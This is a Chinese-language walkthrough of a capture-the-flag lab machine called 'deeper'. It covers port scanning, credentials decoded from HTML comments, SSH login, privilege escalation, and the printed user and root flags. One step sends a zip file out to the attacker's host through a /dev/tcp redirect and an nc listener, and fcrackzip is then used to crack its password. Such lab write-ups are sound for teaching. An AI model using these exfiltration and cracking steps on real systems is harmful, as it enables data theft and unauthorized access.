信息搜集
主机扫描
arp-scan -l
搜索主机ip端口扫描
nmap -sV -p- -Pn 192.168.168.99
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-21 22:22 EDT
Nmap scan report for 192.168.168.99
Host is up (0.00063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.57 ((Debian))
MAC Address: 08:00:27:5E:97:3F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.65 seconds
网站路径
- 扫描路径什么也没有,于是看看网站源码,发现一个路径/deeper
- 还是一个图片,在此查看源码,/evendeeper
- 还是一个文字,开始挖掘,查看源码,发现密码
<!-- USER .- .-.. .. -.-. . --> =>user=ALICE
<!-- PASS 53586470624778486230526c5a58426c63673d3d --> =>pass=IwillGoDeeper
(md5+base64)
藏在源码的犄角旮旯,自己好好找找获取shell
利用ssh登录
alice@deeper:~$ cat user.txt
7e267b737cc121c29b496dc3bcffa5a7
提权
- 发现一个bob用户的txt,疑似密码
alice@deeper:~$ cat .bob.txt
535746745247566c634556756233566e61413d3d
确实是= IamDeepEnough
发现一个root.zip,unzip没有用,于是利用nc,将文件传送到我的kali http://162.14.82.114/index.php/550/04/14/2024/)
kali:nc -lp 8888 > root.zip
靶机:cat root.zip > /dev/tcp/192.168.168.205/8888(下文解释)
解压需要密码,利用爆破工具fcrackzip:
-u 表示只显示破解出来的密码,其他错误的密码不显示出
-D 表示要使用字典破解
-p 表示要使用那个字典破解
拿取root.txt
bob@deeper:~$ su root
Password:
root@deeper:/home/bob# ls
root.zip
root@deeper:/home/bob# cd /root
root@deeper:~# ls -a
. .. .bash_history .bashrc .lesshst .local .profile root.txt .ssh
root@deeper:~# cat root.txt
dbc56c8328ee4d00bbdb658a8fc3e895
root@deeper:~# 知识点:
- 信息搜集,源码的检查
- nc文件传输:nc -lp port > 文件名
- * cat: 这是一个命令,用于连接文件并打印它们的内容到标准输出。
* root.zip: 这是要读取的文件名,cat 命令将会读取它的内容。
* > /dev/tcp/192.168.168.205/8888: 这部分是一个重定向,它将 cat 命令的输出重定向到一个特殊的 设备文件 /dev/tcp/192.168.168.205/8888,这个设备文件实际上代表了一个 TCP 连接。 192.168.168.205 是目标主机的 IP 地址,8888 是目标端口号。 - 爆破文件fcrackzip工具的使用